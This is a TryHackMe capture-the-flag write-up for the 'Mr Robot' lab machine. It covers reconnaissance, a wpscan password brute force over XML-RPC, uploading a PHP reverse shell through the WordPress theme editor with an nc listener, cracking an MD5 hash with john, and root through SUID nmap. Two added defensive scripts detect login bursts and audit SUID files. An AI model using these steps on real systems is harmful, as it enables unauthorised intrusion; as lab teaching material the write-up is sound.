THM Writeup – Mr Robot CTF
Based on the Mr. Robot show, can you root this box?
Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?
Credit to Leon Johnson for creating this machine.
Add the IP address to your hosts file:
echo '10.10.178.185 robot.thm' >> /etc/hosts
Scan the target machine – find open ports first:
nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv robot.thm
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
443/tcp open https syn-ack ttl 64
Get more details about open ports:
nmap -T4 -A -p 80,443 robot.thm
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
We have ports 80 and 443 open – a web application running under the Apache web server.
Check both ports – port 80 first – browse to http://robot.thm/:
There is a very cool application.
Now port 443 – browse to https://robot.thm
It looks like exactly the same web application, just served on port 443.
Looking for the first key
Check the source code of the web site – view page source:
At this point, I checked (tried) all those commands the web site provided us, but found really nothing of interest.
Directory bruteforce the web application:
root@ip-10-10-40-183:~# gobuster dir -u http://robot.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
/index.php (Status: 301)
/index.html (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/wp-login.php (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/wp-register.php (Status: 301)
/Image (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/readme.html (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
Progress: 2030 / 220561 (0.92%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
As you can see, I stopped the scan because I had already found what I wanted – it looks like it is a WordPress application with some interesting pages/files: /admin, /login and /robots.txt.
Ok, now browse to http://robot.thm/login
Yes, it is a WordPress application, so let’s gather more information:
root@ip-10-10-40-183:~# wpscan --url robot.thm -e vp,u
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.7
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://robot.thm/ [10.10.178.185]
[+] Started: Fri Feb 18 12:37:20 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://robot.thm/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://robot.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] The external WP-Cron seems to be enabled: http://robot.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://robot.thm/e7a3a7b.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://robot.thm/e7a3a7b.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://robot.thm/wp-content/themes/twentyfifteen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://robot.thm/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Fri Feb 18 12:37:35 2022
[+] Requests Done: 73
[+] Cached Requests: 6
[+] Data Sent: 14.682 KB
[+] Data Received: 17.923 MB
[+] Memory used: 238.102 MB
[+] Elapsed time: 00:00:15
We found out some interesting information:
- there is a robots.txt file – we’ll check that soon
- XML-RPC is enabled
- it is a vulnerable/insecure WordPress version, 4.3.1
- the theme in use is twentyfifteen
Check the /admin site now – browsing to http://robot.thm/admin, we are redirected to http://robot.thm/admin/index.html. The page keeps refreshing, so view the page source:
It is the same web site (source) as before, and I think we are not allowed to enter /admin/index.html because we don’t have the correct IP address…
Now check /robots.txt – browse to http://robot.thm/robots.txt
Hmmm, this is something we are interested in – it looks like we found the first key.
Open the key-1-of-3.txt file by browsing to http://robot.thm/key-1-of-3.txt
Looking for the second key
To download fsocity.dic, browse to http://robot.thm/fsocity.dic
XML-RPC is enabled, so we can try to find the login password using the dictionary we found:
root@ip-10-10-40-183:~# wpscan --url robot.thm --usernames elliot --passwords fsocity.dic --max-threads 50
I have to admit, first I ran this command with the username mrrobot and, as you can expect, I didn’t reveal the password. Then I remembered the name elliot 🙂
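From the defender's side, a run like the one above shows up in the web server access log as a burst of POST requests to xmlrpc.php (or wp-login.php) from one source. The following detector is an added example, not part of the original writeup: it parses combined-format log lines, counts login-endpoint POSTs per source IP in a sliding one-minute window, and flags any source above a threshold. The sample log lines, the attacker address and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Endpoints that accept WordPress credentials: the login form and the XML-RPC API,
# which wpscan's --passwords mode uses when XML-RPC is enabled.
LOGIN_PATHS = ("/xmlrpc.php", "/wp-login.php")

def parse_line(line):
    """Return (ip, timestamp, method, path without query string, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])

def detect_login_bursts(lines, threshold=20, window=timedelta(minutes=1)):
    """Return {ip: peak_count} for sources that POSTed to a login endpoint more than
    `threshold` times inside any span of length `window` (sliding window per source)."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] in LOGIN_PATHS:
            posts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count > threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged

# Constructed sample log: 30 XML-RPC POSTs from one address within 30 seconds
# (what a dictionary attack looks like server-side), plus ordinary traffic.
SAMPLE_LOG = [
    f'10.10.40.183 - - [18/Feb/2022:12:40:{i:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WPScan v3.8.7"'
    for i in range(30)
] + [
    '192.0.2.10 - - [18/Feb/2022:12:40:05 +0000] "GET /blog HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Feb/2022:12:41:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, n in detect_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} login POSTs inside one minute")
```

Note that XML-RPC returns HTTP 200 whether or not the credentials were valid, so the status code alone does not distinguish failed attempts; the request rate per source is the useful signal.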
Go to http://robot.thm/login and log in with the username elliot and the password we’ve just obtained:
Check what role our user has – click Users:
Great news – our user is an administrator.
We know that the theme editor can be utilized to upload PHP reverse shells, so we’ll upload one to the 404.php page:
root@ip-10-10-40-183:~# cp /usr/share/webshells/php/php-reverse-shell.php 404.php
root@ip-10-10-40-183:~# nano 404.php
So we copied the PHP reverse shell to our current working directory as 404.php; now open it and modify the IP address ($ip) and port ($port) parameters:
In the WP administration go to Appearance > Editor > 404 Template (on the right):
Copy the content of your 404.php, paste it as the template and click Upload File:
Start netcat listener:
nc -lnvp 4242
Browse to http://robot.thm/wp-content/themes/twentyfifteen/404.php (or http://robot.thm/?p=404.php) and we receive a reverse shell:
Note: http://robot.thm/?p=404.php did not work this time…
Upgrade the shell:
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color
reset
Look around – find the second key:
daemon@linux:/$ ls -lA /home/
total 4
drwxr-xr-x 2 root root 4096 Nov 13 2015 robot
daemon@linux:/$ ls -lA /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
We found the second key; however, we are not allowed to read it – only the robot user has permission to read it.
Anyway, we found an interesting file named password.raw-md5, let’s check it out:
daemon@linux:/$ cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
That should be the robot’s password hash.
Copy the hash to a file on your attacking machine and try to crack it:
root@ip-10-10-40-183:~# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash
root@ip-10-10-40-183:~# john -w=/usr/share/wordlists/rockyou.txt --format=raw-md5 hash
[REDACTED] (?)
Great, we have robot’s password, so switch to the robot user:
daemon@linux:/$ su robot
Password:
robot@linux:/$
Read the second key:
robot@linux:/$ cat /home/robot/key-2-of-3.txt
[REDACTED]
Looking for the third key
Now, I guess, we need to be root to be able to read the third key – so we have to find a privilege escalation vector.
What can the robot user do with sudo:
robot@linux:/$ sudo -l
[sudo] password for robot:
Sorry, user robot may not run sudo on linux.
Check scheduled tasks:
robot@linux:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
21 * * * * bitnami cd /opt/bitnami/stats && ../agent.bin --run -D
Check executables with SUID bit set:
robot@linux:/$ find / -type f -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
Nah, finally we found something interesting – the SUID bit is set on nmap.
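An administrator can catch exactly this misconfiguration by comparing the set-uid binaries on a host against a known-good baseline. The script below is an added example, not from the original writeup: find_suid() reproduces the find command above in Python, and audit_suid() flags anything outside package-managed paths or missing from the baseline. The baseline set and the local-prefix list are constructed assumptions; the sample listing is the output obtained on this box.

```python
import os
import stat

# Constructed baseline: the set-uid binaries a stock install of this distro ships.
# Generate a real one from a clean image of the same release, not from the host under audit.
EXPECTED_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/pt_chown",
    "/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper",
    "/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper",
}
# Package managers do not install set-uid binaries under these prefixes (assumed list),
# so a hit there is either hand-installed, as nmap was here, or planted.
LOCAL_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def find_suid(root="/"):
    """Walk the filesystem and return regular files with the set-uid bit set,
    the Python equivalent of `find / -type f -perm -4000 2>/dev/null`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                      # unreadable entry, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def audit_suid(paths, expected=EXPECTED_SUID):
    """Return {path: reason} for every set-uid file that should not be there."""
    findings = {}
    for path in paths:
        if path.startswith(LOCAL_PREFIXES):
            findings[path] = "set-uid binary outside package-managed paths"
        elif path not in expected:
            findings[path] = "set-uid binary not in baseline"
    return findings

# The listing obtained on the box, used here as sample input.
SAMPLE_LISTING = """/bin/ping /bin/umount /bin/mount /bin/ping6 /bin/su /usr/bin/passwd
/usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo
/usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/pt_chown""".split()

if __name__ == "__main__":
    for path, reason in audit_suid(find_suid() or SAMPLE_LISTING).items():
        print(f"{path}: {reason}")
```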
Check GTFOBins:
Ok, this is the way we can write to a file with elevated privileges, but we need to read the key…
First we have to run nmap in interactive mode and start a shell:
robot@linux:/$ nmap --interactive
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
As we can see, our effective permissions are root.
So find the third key and read it:
# ls /root
firstboot_done key-3-of-3.txt
# cat /root/key-3-of-3.txt
[REDACTED]
Do you like this writeup? Check out other THM Writeups.